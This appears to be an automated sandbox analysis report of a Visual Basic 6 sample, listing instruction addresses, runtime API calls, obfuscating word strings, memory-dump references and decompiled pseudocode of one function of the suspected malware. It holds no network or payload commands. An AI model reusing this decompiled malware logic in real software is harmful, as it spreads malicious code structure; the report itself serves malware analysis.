0x0040f960
0x0040f976
0x0040f993
0x0040f978
0x0040f978
0x0040f97d
0x0040f982
0x0040f987
0x0040f987
0x0040f9b7
0x0040f9bb
0x0040f9c0
0x0040f9d8
0x0040f9de
0x0040f9e0
0x0040f9ed
0x0040fa12
0x0040f9ef
0x0040f9ef
0x0040f9f4
0x0040f9f9
0x0040f9ff
0x0040fa05
0x0040fa0a
0x0040fa0a
0x0040fa19
0x0040fa1b
0x0040fa1d
0x0040fa23
0x0040fa24
0x0040fa29
0x0040fa33
0x0040fa50
0x0040fa35
0x0040fa35
0x0040fa3a
0x0040fa3f
0x0040fa44
0x0040fa44
0x0040fa74
0x0040fa78
0x0040fa7d
0x0040fa95
0x0040fa9b
0x0040fa9d
0x0040faaa
0x0040facf
0x0040faac
0x0040faac
0x0040fab1
0x0040fab6
0x0040fabc
0x0040fac2
0x0040fac7
0x0040fac7
0x0040fad9
0x0040fadf
0x0040faec
0x0040faf7
0x0040fb05
0x0040fb0d
0x0040fb13
0x0040fb20
0x0040fb3e
0x0040fb42
0x0040fb4c
0x0040fb5e
0x0040fb67
0x0040fb6b
0x0040fb6f
0x0040fb73
0x0040fb74
0x0040fb76
0x0040fb81
0x0040fb85
0x0040fb89
0x0040fb8d
0x0040fb8e
0x0040fb90
0x0040fb95
0x0040fb9b
0x0040fba7
0x0040fbc4
0x0040fba9
0x0040fba9
0x0040fbae
0x0040fbb3
0x0040fbb8
0x0040fbb8
0x0040fbe8
0x0040fbec
0x0040fbf1
0x0040fc09
0x0040fc0c
0x0040fc0e
0x0040fc1b
0x0040fc3d
0x0040fc1d
0x0040fc1d
0x0040fc1f
0x0040fc24
0x0040fc2a
0x0040fc30
0x0040fc35
0x0040fc35
0x0040fc4b
0x0040fc68
0x0040fc4d
0x0040fc4d
0x0040fc52
0x0040fc57
0x0040fc5c
0x0040fc5c
0x0040fc8c
0x0040fc90
0x0040fc95
0x0040fcb0
0x0040fcb6
0x0040fcb8
0x0040fcc5
0x0040fcea
0x0040fcc7
0x0040fcc7
0x0040fccc
0x0040fcd1
0x0040fcd7
0x0040fcdd
0x0040fce2
0x0040fce2
0x0040fcf7
0x0040fd00
0x0040fd06
0x0040fd10
0x0040fd13
0x0040fd2e
0x0040fd3d
0x0040fd43
0x0040fd50
0x0040fd72
0x0040fd52
0x0040fd52
0x0040fd57
0x0040fd5c
0x0040fd5f
0x0040fd65
0x0040fd6a
0x0040fd6a
0x0040fd7f
0x0040fd85
0x0040fd94
0x0040fda4
0x0040fdaa
0x0040fdac
0x0040fdb9
0x0040fddb
0x0040fdbb
0x0040fdbb
0x0040fdc0
0x0040fdc5
0x0040fdc8
0x0040fdce
0x0040fdd3
0x0040fdd3
0x0040fde2
0x0040fde2
0x0040fdec
0x0040fdf9
0x0040fe00
0x0040fe04
0x0040fe05
0x0040fe0f
0x0040fe14
0x0040fe1e
0x0040fe2b
0x0040fe2c
0x0040fe32
0x0040fe33
0x0040fe3d
0x00000000
0x00000000
0x0040fe3f
0x0040fe46
0x0040fe47

APIs

__vbaChkstk.MSVBVM60(?,00401346), ref: 0040EFDF
#583.MSVBVM60(?,?,?,?,?,?,00401346), ref: 0040F015
__vbaFpR8.MSVBVM60(?,?,?,?,?,?,00401346), ref: 0040F01A
__vbaNew2.MSVBVM60(00401DE0,00413010,?,?,?,?,?,?,00401346), ref: 0040F038
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040F071
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C78,00000158), ref: 0040F0BB
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0040F0DA
__vbaNew2.MSVBVM60(00401DE0,00413010,?,?,?,00401346), ref: 0040F0F5
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040F12E
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403AA8,00000130), ref: 0040F17B
__vbaNew2.MSVBVM60(00401DE0,00413010), ref: 0040F1A2
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040F1DB
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C78,00000098), ref: 0040F228
__vbaI4Var.MSVBVM60(?,005FB7D4,00000535,ERGODIC,?,?,?), ref: 0040F291
__vbaHresultCheckObj.MSVBVM60(00000000,00401278,00402478,000006F8), ref: 0040F2D3
__vbaFreeObjList.MSVBVM60(00000004,?,?,?,?), ref: 0040F304
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,00401346), ref: 0040F30F
__vbaNew2.MSVBVM60(00401DE0,00413010,?,?,?,?,?,?,?,?,00401346), ref: 0040F327
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040F360
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C78,00000190), ref: 0040F3AD
__vbaNew2.MSVBVM60(00401DE0,00413010), ref: 0040F3D4
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040F40D
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C78,00000068), ref: 0040F454
__vbaStrCopy.MSVBVM60(00000000,?,00403C78,00000068), ref: 0040F483
__vbaFreeStr.MSVBVM60(?,?,0056A744,?,00004D1E), ref: 0040F4D5
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,0056A744,?,00004D1E), ref: 0040F4E4
__vbaNew2.MSVBVM60(00401DE0,00413010,?,?,?,?,?,?,?,?,?,?,?,00401346), ref: 0040F4FF
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040F538
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C78,00000130), ref: 0040F582
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0040F5A1
__vbaNew2.MSVBVM60(00401DE0,00413010), ref: 0040F5BC
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040F5F5
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C78,00000158), ref: 0040F63F
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0040F65E
__vbaNew2.MSVBVM60(00401DE0,00413010), ref: 0040F679
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040F6B2
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C78,00000120), ref: 0040F6FF
__vbaNew2.MSVBVM60(00401DE0,00413010), ref: 0040F726
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040F75F
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C78,00000080), ref: 0040F7AC
__vbaStrCopy.MSVBVM60(00000000,?,00403C78,00000080), ref: 0040F7C8
__vbaStrCopy.MSVBVM60(00000000,?,00403C78,00000080), ref: 0040F7E1
__vbaI4Var.MSVBVM60(?,?,?,?,?), ref: 0040F80B
__vbaStrVarMove.MSVBVM60(?,00000000,?,?,?,?,?), ref: 0040F815
__vbaStrMove.MSVBVM60(?,00000000,?,?,?,?,?), ref: 0040F81F
__vbaHresultCheckObj.MSVBVM60(00000000,00401278,00402478,000006FC,?,?,?,00000000,?,00000000,?,?,?,?,?), ref: 0040F867
__vbaFreeStrList.MSVBVM60(00000003,?,?,?,?,?,?,00000000,?,00000000,?,?,?,?,?), ref: 0040F889
__vbaFreeObjList.MSVBVM60(00000006,?,?,?,?,?,?), ref: 0040F8AB
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0040F8BD
__vbaNew2.MSVBVM60(00401DE0,00413010), ref: 0040F8D8
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040F911
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C78,00000110), ref: 0040F95B
__vbaNew2.MSVBVM60(00401DE0,00413010), ref: 0040F982
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040F9BB
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403AA8,000001B8), ref: 0040FA05
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0040FA24
__vbaNew2.MSVBVM60(00401DE0,00413010), ref: 0040FA3F
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040FA78
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403AA8,00000158), ref: 0040FAC2
__vbaStrMove.MSVBVM60(00000000,?,00403AA8,00000158), ref: 0040FAEC
__vbaStrCopy.MSVBVM60(00000000,?,00403AA8,00000158), ref: 0040FB05
__vbaStrMove.MSVBVM60(00000000,?,00403AA8,00000158), ref: 0040FB20
__vbaStrVarMove.MSVBVM60(?,?,?,?,484F2760,00005AFE), ref: 0040FB42
__vbaStrMove.MSVBVM60(?,?,?,?,484F2760,00005AFE), ref: 0040FB4C
__vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 0040FB76
__vbaFreeObjList.MSVBVM60(00000004,?,?,?,?), ref: 0040FB90
__vbaFreeVar.MSVBVM60 ref: 0040FB9B
__vbaNew2.MSVBVM60(00401DE0,00413010), ref: 0040FBB3
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040FBEC
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E24,00000050), ref: 0040FC30
__vbaNew2.MSVBVM60(00401DE0,00413010), ref: 0040FC57
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040FC90
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E24,00000088), ref: 0040FCDD
__vbaStrMove.MSVBVM60(00000000,?,00403E24,00000088), ref: 0040FD13
__vbaHresultCheckObj.MSVBVM60(00000000,00401278,00402478,00000700,?,?,?,?), ref: 0040FD65
__vbaFreeStr.MSVBVM60(?,?,?,?), ref: 0040FD85
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,?,?), ref: 0040FD94
__vbaHresultCheckObj.MSVBVM60(00000000,00401278,00402448,000002B4), ref: 0040FDCE
__vbaVarAdd.MSVBVM60(?,00000002,?), ref: 0040FE05
__vbaVarMove.MSVBVM60(?,00000002,?), ref: 0040FE0F
__vbaVarTstLt.MSVBVM60(00008003,?,?,00000002,?), ref: 0040FE33

Strings

HEPATOPHYMA, xrefs: 0040F4AF
Naturforekomsten, xrefs: 0040FAFD
Likviderende, xrefs: 0040F47B
Caingang, xrefs: 0040F4B4
Fosterfordrivelsens, xrefs: 0040F7C0
ERGODIC, xrefs: 0040F27C
Boligomraade, xrefs: 0040F7D9

Memory Dump Source

Source File: 00000000.00000002.686342372.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686338365.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686356771.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686361470.0000000000415000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$New2$Free$ListMove$CallCopyLate$#583Chkstk
String ID: Boligomraade$Caingang$ERGODIC$Fosterfordrivelsens$HEPATOPHYMA$Likviderende$Naturforekomsten
API String ID: 1355606445-1774157282
Opcode ID: d99fb655805bae738e620ee1489da0c85813a49ce717c0351f7de0e2b0af6e1a
Instruction ID: bbdb456125787ca987c727c549916d9232436c19d8e8b9105a6ae56320b1f20a
Opcode Fuzzy Hash: d99fb655805bae738e620ee1489da0c85813a49ce717c0351f7de0e2b0af6e1a
Instruction Fuzzy Hash: B792E671900218AFDB20DF90CC45FD9B7B9BB48305F1045FAE10ABB2A1DB795A88DF59

Uniqueness

Uniqueness Score: -1.00%

Function 00411AAE, Relevance: 149.5, APIs: 80, Strings: 5, Instructions: 720
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E00411AAE(void* __ebx, void* __edi, void* __esi, signed int __fp0, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				void* _v32;
				signed int _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				short _v52;
				short _v56;
				signed int _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				signed int _v84;
				char _v92;
				signed int _v100;
				char _v108;
				signed int _v116;
				char _v124;
				signed int _v132;
				intOrPtr _v140;
				signed int _v148;
				intOrPtr _v156;
				short _v160;
				char _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				intOrPtr* _v204;
				signed int _v208;
				signed int _v212;
				intOrPtr* _v216;
				signed int _v220;
				intOrPtr* _v224;
				signed int _v228;
				signed int _v232;
				intOrPtr* _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				char _v252;
				signed int _v256;
				intOrPtr* _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				intOrPtr* _v276;
				signed int _v280;
				intOrPtr* _v284;
				short _v288;
				char _v292;
				signed int _v296;
				intOrPtr* _v300;
				signed int _v304;
				signed int _v308;
				signed int _t338;
				signed int _t343;
				signed int _t350;
				signed int _t354;
				signed int _t356;
				signed int _t369;
				signed int _t374;
				signed int _t381;
				short _t386;
				signed int _t396;
				signed int _t401;
				signed int _t405;
				signed int _t409;
				signed int _t416;
				signed int _t422;
				signed int _t426;
				signed int _t429;
				signed int _t435;
				signed int _t443;
				signed int _t447;
				signed int _t450;
				signed int _t456;
				char* _t474;
				intOrPtr _t481;
				intOrPtr _t495;
				void* _t523;
				void* _t525;
				intOrPtr _t526;
				signed int* _t527;
				signed int _t542;
				signed int _t559;

				_t559 = __fp0;
				_t526 = _t525 - 0xc;
				 *[fs:0x0] = _t526;
				L00401340();
				_v16 = _t526;
				_v12 = 0x401330;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401346, _t523);
				if( *0x4134b0 != 0) {
					_v204 = 0x4134b0;
				} else {
					_push(0x4134b0);
					_push(0x403ef0);
					L00401592();
					_v204 = 0x4134b0;
				}
				_v168 =  *_v204;
				_t338 =  *((intOrPtr*)( *_v168 + 0x14))(_v168,  &_v72);
				asm("fclex");
				_v172 = _t338;
				if(_v172 >= 0) {
					_v208 = _v208 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x403ee0);
					_push(_v168);
					_push(_v172);
					L0040158C();
					_v208 = _t338;
				}
				_v176 = _v72;
				_t343 =  *((intOrPtr*)( *_v176 + 0xc0))(_v176,  &_v160);
				asm("fclex");
				_v180 = _t343;
				if(_v180 >= 0) {
					_v212 = _v212 & 0x00000000;
				} else {
					_push(0xc0);
					_push(0x4042c8);
					_push(_v176);
					_push(_v180);
					L0040158C();
					_v212 = _t343;
				}
				_v56 = _v160;
				L0040155C();
				_push(1);
				_push(1);
				_push(1);
				_push( &_v92);
				L004013E8();
				_push( &_v92);
				L004014D2();
				L00401508();
				L00401562();
				if( *0x413010 != 0) {
					_v216 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x401de0);
					L00401592();
					_v216 = 0x413010;
				}
				_t350 =  &_v72;
				L00401598();
				_v168 = _t350;
				_t354 =  *((intOrPtr*)( *_v168 + 0x1e8))(_v168,  &_v160, _t350,  *((intOrPtr*)( *((intOrPtr*)( *_v216)) + 0x308))( *_v216));
				asm("fclex");
				_v172 = _t354;
				if(_v172 >= 0) {
					_v220 = _v220 & 0x00000000;
				} else {
					_push(0x1e8);
					_push(0x403aa8);
					_push(_v168);
					_push(_v172);
					L0040158C();
					_v220 = _t354;
				}
				_v84 = _v160;
				_v92 = 2;
				_t356 =  &_v92;
				_push(_t356);
				L00401460();
				L00401508();
				_push(_t356);
				_push(0x4042f8);
				_push(0x404300);
				L0040147E();
				L00401508();
				_push(_t356);
				_push(L"teger");
				L0040147E();
				L00401508();
				_push(_t356);
				L00401478();
				asm("sbb eax, eax");
				_v176 =  ~( ~( ~_t356));
				_push( &_v68);
				_push( &_v64);
				_push( &_v60);
				_push(3);
				L0040156E();
				_t527 = _t526 + 0x10;
				L0040155C();
				L00401562();
				if(_v176 != 0) {
					_v116 = L"SAMMENSTILLINGERNE";
					_v124 = 8;
					L0040154A();
					_push( &_v92);
					L00401502();
					L00401508();
					L00401562();
				}
				if( *0x4134b0 != 0) {
					_v224 = 0x4134b0;
				} else {
					_push(0x4134b0);
					_push(0x403ef0);
					L00401592();
					_v224 = 0x4134b0;
				}
				_v168 =  *_v224;
				_t369 =  *((intOrPtr*)( *_v168 + 0x14))(_v168,  &_v72);
				asm("fclex");
				_v172 = _t369;
				if(_v172 >= 0) {
					_v228 = _v228 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x403ee0);
					_push(_v168);
					_push(_v172);
					L0040158C();
					_v228 = _t369;
				}
				_v176 = _v72;
				_t374 =  *((intOrPtr*)( *_v176 + 0xf8))(_v176,  &_v60);
				asm("fclex");
				_v180 = _t374;
				if(_v180 >= 0) {
					_v232 = _v232 & 0x00000000;
				} else {
					_push(0xf8);
					_push(0x4042c8);
					_push(_v176);
					_push(_v180);
					L0040158C();
					_v232 = _t374;
				}
				_v192 = _v60;
				_v60 = _v60 & 0x00000000;
				L00401508();
				L0040155C();
				if( *0x4134b0 != 0) {
					_v236 = 0x4134b0;
				} else {
					_push(0x4134b0);
					_push(0x403ef0);
					L00401592();
					_v236 = 0x4134b0;
				}
				_v168 =  *_v236;
				_t381 =  *((intOrPtr*)( *_v168 + 0x14))(_v168,  &_v72);
				asm("fclex");
				_v172 = _t381;
				if(_v172 >= 0) {
					_v240 = _v240 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x403ee0);
					_push(_v168);
					_push(_v172);
					L0040158C();
					_v240 = _t381;
				}
				_v176 = _v72;
				_t386 =  *((intOrPtr*)( *_v176 + 0x118))(_v176,  &_v164);
				asm("fclex");
				_v180 = _t386;
				_t542 = _v180;
				if(_t542 >= 0) {
					_v244 = _v244 & 0x00000000;
				} else {
					_push(0x118);
					_push(0x4042c8);
					_push(_v176);
					_push(_v180);
					L0040158C();
					_v244 = _t386;
				}
				L004013E2();
				_v52 = _t386;
				_t474 =  &_v72;
				L0040155C();
				_v100 = 0x80020004;
				_v108 = 0xa;
				_v84 = 0x80020004;
				_v92 = 0xa;
				_push( &_v108);
				_push( &_v92);
				asm("fld1");
				_push(_t474);
				_push(_t474);
				_v172 = _t559;
				asm("fld1");
				_push(_t474);
				_push(_t474);
				_v180 = _t559;
				asm("fld1");
				_push(_t474);
				_push(_t474);
				 *_t527 = _t559;
				asm("fld1");
				_push(_t474);
				_push(_t474);
				_v196 = _t559;
				L00401406();
				L004014B4();
				asm("fcomp qword [0x401300]");
				asm("fnstsw ax");
				asm("sahf");
				if(_t542 == 0) {
					_v248 = _v248 & 0x00000000;
				} else {
					_v248 = 1;
				}
				_v168 =  ~_v248;
				_push( &_v108);
				_push( &_v92);
				_push(2);
				L0040153E();
				if(_v168 != 0) {
					if( *0x4134b0 != 0) {
						_v252 = 0x4134b0;
					} else {
						_push(0x4134b0);
						_push(0x403ef0);
						L00401592();
						_v252 = 0x4134b0;
					}
					_v168 =  *_v252;
					_t456 =  *((intOrPtr*)( *_v168 + 0x48))(_v168, 0x71,  &_v60);
					asm("fclex");
					_v172 = _t456;
					if(_v172 >= 0) {
						_v256 = _v256 & 0x00000000;
					} else {
						_push(0x48);
						_push(0x403ee0);
						_push(_v168);
						_push(_v172);
						L0040158C();
						_v256 = _t456;
					}
					_v196 = _v60;
					_v60 = _v60 & 0x00000000;
					L00401508();
				}
				L004013DC();
				_v36 = _t559;
				_push(L"Naivitets");
				_push(L"Pseudisodomic9");
				_push( &_v92); // executed
				L004013D6(); // executed
				_v116 = _v116 & 0x00000000;
				_v124 = 0x8008;
				_push( &_v92);
				_t396 =  &_v124;
				_push(_t396);
				L00401490();
				_v168 = _t396;
				L00401562();
				if(_v168 != 0) {
					if( *0x413010 != 0) {
						_v260 = 0x413010;
					} else {
						_push(0x413010);
						_push(0x401de0);
						L00401592();
						_v260 = 0x413010;
					}
					_t495 =  *((intOrPtr*)( *_v260));
					_t443 =  &_v72;
					L00401598();
					_v168 = _t443;
					_t447 =  *((intOrPtr*)( *_v168 + 0x60))(_v168,  &_v164, _t443,  *((intOrPtr*)(_t495 + 0x30c))( *_v260));
					asm("fclex");
					_v172 = _t447;
					if(_v172 >= 0) {
						_v264 = _v264 & 0x00000000;
					} else {
						_push(0x60);
						_push(0x403e24);
						_push(_v168);
						_push(_v172);
						L0040158C();
						_v264 = _t447;
					}
					L00401526();
					asm("fild dword [ebp-0xa0]");
					_v268 =  *0x401328;
					_v244 = _v268;
					_v248 =  *0x401324;
					_v252 =  *0x401320;
					_t559 =  *0x40131c;
					_v256 = _t559;
					_t450 =  *((intOrPtr*)( *_a4 + 0x2c8))(_a4, 6, _t495, _t495, _t495, _t495, _t447);
					asm("fclex");
					_v176 = _t450;
					if(_v176 >= 0) {
						_v272 = _v272 & 0x00000000;
					} else {
						_push(0x2c8);
						_push(0x402448);
						_push(_a4);
						_push(_v176);
						L0040158C();
						_v272 = _t450;
					}
					L0040155C();
				}
				if( *0x413010 != 0) {
					_v276 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x401de0);
					L00401592();
					_v276 = 0x413010;
				}
				_t401 =  &_v72;
				L00401598();
				_v168 = _t401;
				_t405 =  *((intOrPtr*)( *_v168 + 0x1f0))(_v168,  &_v160, _t401,  *((intOrPtr*)( *((intOrPtr*)( *_v276)) + 0x308))( *_v276));
				asm("fclex");
				_v172 = _t405;
				if(_v172 >= 0) {
					_v280 = _v280 & 0x00000000;
				} else {
					_push(0x1f0);
					_push(0x403aa8);
					_push(_v168);
					_push(_v172);
					L0040158C();
					_v280 = _t405;
				}
				if( *0x413010 != 0) {
					_v284 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x401de0);
					L00401592();
					_v284 = 0x413010;
				}
				_t481 =  *((intOrPtr*)( *_v284));
				_t409 =  &_v76;
				L00401598();
				_v176 = _t409;
				_v148 = 0x80020004;
				_v156 = 0xa;
				_v132 = 0x80020004;
				_v140 = 0xa;
				_v116 = 0x80020004;
				_v124 = 0xa;
				L00401340();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L00401340();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L00401340();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v288 = _v160;
				asm("fild dword [ebp-0x11c]");
				_v292 = _t559;
				_v252 = _v292;
				_t416 =  *((intOrPtr*)( *_v176 + 0x1b4))(_v176, _t481, 0x10, 0x10, 0x10, _t409,  *((intOrPtr*)(_t481 + 0x300))( *_v284));
				asm("fclex");
				_v180 = _t416;
				if(_v180 >= 0) {
					_v296 = _v296 & 0x00000000;
				} else {
					_push(0x1b4);
					_push(0x403c78);
					_push(_v176);
					_push(_v180);
					L0040158C();
					_v296 = _t416;
				}
				_push( &_v76);
				_push( &_v72);
				_push(2);
				L00401568();
				if( *0x413010 != 0) {
					_v300 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x401de0);
					L00401592();
					_v300 = 0x413010;
				}
				_t422 =  &_v72;
				L00401598();
				_v168 = _t422;
				_t426 =  *((intOrPtr*)( *_v168 + 0x170))(_v168,  &_v60, _t422,  *((intOrPtr*)( *((intOrPtr*)( *_v300)) + 0x2fc))( *_v300));
				asm("fclex");
				_v172 = _t426;
				if(_v172 >= 0) {
					_v304 = _v304 & 0x00000000;
				} else {
					_push(0x170);
					_push(0x403c78);
					_push(_v168);
					_push(_v172);
					L0040158C();
					_v304 = _t426;
				}
				_v200 = _v60;
				_v60 = _v60 & 0x00000000;
				_v84 = _v200;
				_v92 = 8;
				_t429 =  &_v92;
				_push(_t429);
				L00401460();
				L00401508();
				_push(_t429);
				_push(L"Stri");
				_push(0x404390);
				L0040147E();
				L00401508();
				_push(_t429);
				L00401478();
				asm("sbb eax, eax");
				_v176 =  ~( ~( ~_t429));
				_push( &_v68);
				_push( &_v64);
				_push(2);
				L0040156E();
				L0040155C();
				L00401562();
				_t435 = _v176;
				if(_t435 != 0) {
					_v132 = 0x80020004;
					_v140 = 0xa;
					_v116 = 0x80020004;
					_v124 = 0xa;
					L00401340();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					L00401340();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t435 =  *((intOrPtr*)( *_a4 + 0x2b0))(_a4, 0x10, 0x10);
					asm("fclex");
					_v168 = _t435;
					if(_v168 >= 0) {
						_v308 = _v308 & 0x00000000;
					} else {
						_push(0x2b0);
						_push(0x402448);
						_push(_a4);
						_push(_v168);
						L0040158C();
						_v308 = _t435;
					}
				}
				_v28 =  *0x401318;
				asm("wait");
				_push(0x412682);
				L00401538();
				L00401538();
				L00401538();
				L00401538();
				return _t435;
			}

0x00411aae
0x00411ab1
0x00411ac0
0x00411acc
0x00411ad4
0x00411ad7
0x00411ade
0x00411aed
0x00411af7
0x00411b14
0x00411af9
0x00411af9
0x00411afe
0x00411b03
0x00411b08
0x00411b08
0x00411b26
0x00411b3e
0x00411b41
0x00411b43
0x00411b50
0x00411b72
0x00411b52
0x00411b52
0x00411b54
0x00411b59
0x00411b5f
0x00411b65
0x00411b6a
0x00411b6a
0x00411b7c
0x00411b97
0x00411b9d
0x00411b9f
0x00411bac
0x00411bd1
0x00411bae
0x00411bae
0x00411bb3
0x00411bb8
0x00411bbe
0x00411bc4
0x00411bc9
0x00411bc9
0x00411bdf
0x00411be6
0x00411beb
0x00411bed
0x00411bef
0x00411bf4
0x00411bf5
0x00411bfd
0x00411bfe
0x00411c08
0x00411c10
0x00411c1c
0x00411c39
0x00411c1e
0x00411c1e
0x00411c23
0x00411c28
0x00411c2d
0x00411c2d
0x00411c5d
0x00411c61
0x00411c66
0x00411c81
0x00411c87
0x00411c89
0x00411c96
0x00411cbb
0x00411c98
0x00411c98
0x00411c9d
0x00411ca2
0x00411ca8
0x00411cae
0x00411cb3
0x00411cb3
0x00411cc9
0x00411ccd
0x00411cd4
0x00411cd7
0x00411cd8
0x00411ce2
0x00411ce7
0x00411ce8
0x00411ced
0x00411cf2
0x00411cfc
0x00411d01
0x00411d02
0x00411d07
0x00411d11
0x00411d16
0x00411d17
0x00411d1e
0x00411d24
0x00411d2e
0x00411d32
0x00411d36
0x00411d37
0x00411d39
0x00411d3e
0x00411d44
0x00411d4c
0x00411d5a
0x00411d5c
0x00411d63
0x00411d70
0x00411d78
0x00411d79
0x00411d83
0x00411d8b
0x00411d8b
0x00411d97
0x00411db4
0x00411d99
0x00411d99
0x00411d9e
0x00411da3
0x00411da8
0x00411da8
0x00411dc6
0x00411dde
0x00411de1
0x00411de3
0x00411df0
0x00411e12
0x00411df2
0x00411df2
0x00411df4
0x00411df9
0x00411dff
0x00411e05
0x00411e0a
0x00411e0a
0x00411e1c
0x00411e34
0x00411e3a
0x00411e3c
0x00411e49
0x00411e6e
0x00411e4b
0x00411e4b
0x00411e50
0x00411e55
0x00411e5b
0x00411e61
0x00411e66
0x00411e66
0x00411e78
0x00411e7e
0x00411e8b
0x00411e93
0x00411e9f
0x00411ebc
0x00411ea1
0x00411ea1
0x00411ea6
0x00411eab
0x00411eb0
0x00411eb0
0x00411ece
0x00411ee6
0x00411ee9
0x00411eeb
0x00411ef8
0x00411f1a
0x00411efa
0x00411efa
0x00411efc
0x00411f01
0x00411f07
0x00411f0d
0x00411f12
0x00411f12
0x00411f24
0x00411f3f
0x00411f45
0x00411f47
0x00411f4d
0x00411f54
0x00411f79
0x00411f56
0x00411f56
0x00411f5b
0x00411f60
0x00411f66
0x00411f6c
0x00411f71
0x00411f71
0x00411f86
0x00411f8b
0x00411f8f
0x00411f92
0x00411f97
0x00411f9e
0x00411fa5
0x00411fac
0x00411fb6
0x00411fba
0x00411fbb
0x00411fbd
0x00411fbe
0x00411fbf
0x00411fc2
0x00411fc4
0x00411fc5
0x00411fc6
0x00411fc9
0x00411fcb
0x00411fcc
0x00411fcd
0x00411fd0
0x00411fd2
0x00411fd3
0x00411fd4
0x00411fd7
0x00411fdc
0x00411fe1
0x00411fe7
0x00411fe9
0x00411fea
0x00411ff8
0x00411fec
0x00411fec
0x00411fec
0x00412007
0x00412011
0x00412015
0x00412016
0x00412018
0x00412029
0x00412036
0x00412053
0x00412038
0x00412038
0x0041203d
0x00412042
0x00412047
0x00412047
0x00412065
0x0041207f
0x00412082
0x00412084
0x00412091
0x004120b3
0x00412093
0x00412093
0x00412095
0x0041209a
0x004120a0
0x004120a6
0x004120ab
0x004120ab
0x004120bd
0x004120c3
0x004120d0
0x004120d0
0x004120d5
0x004120da
0x004120dd
0x004120e2
0x004120ea
0x004120eb
0x004120f0
0x004120f4
0x004120fe
0x004120ff
0x00412102
0x00412103
0x00412108
0x00412112
0x00412120
0x0041212d
0x0041214a
0x0041212f
0x0041212f
0x00412134
0x00412139
0x0041213e
0x0041213e
0x00412164
0x0041216e
0x00412172
0x00412177
0x00412192
0x00412195
0x00412197
0x004121a4
0x004121c6
0x004121a6
0x004121a6
0x004121a8
0x004121ad
0x004121b3
0x004121b9
0x004121be
0x004121be
0x004121d3
0x004121d9
0x004121df
0x004121ec
0x004121f6
0x00412200
0x00412203
0x0041220a
0x00412217
0x0041221d
0x0041221f
0x0041222c
0x0041224e
0x0041222e
0x0041222e
0x00412233
0x00412238
0x0041223b
0x00412241
0x00412246
0x00412246
0x00412258
0x00412258
0x00412264
0x00412281
0x00412266
0x00412266
0x0041226b
0x00412270
0x00412275
0x00412275
0x004122a5
0x004122a9
0x004122ae
0x004122c9
0x004122cf
0x004122d1
0x004122de
0x00412303
0x004122e0
0x004122e0
0x004122e5
0x004122ea
0x004122f0
0x004122f6
0x004122fb
0x004122fb
0x00412311
0x0041232e
0x00412313
0x00412313
0x00412318
0x0041231d
0x00412322
0x00412322
0x00412348
0x00412352
0x00412356
0x0041235b
0x00412361
0x0041236b
0x00412375
0x0041237c
0x00412386
0x0041238d
0x00412397
0x004123a4
0x004123a5
0x004123a6
0x004123a7
0x004123ab
0x004123b8
0x004123b9
0x004123ba
0x004123bb
0x004123bf
0x004123c9
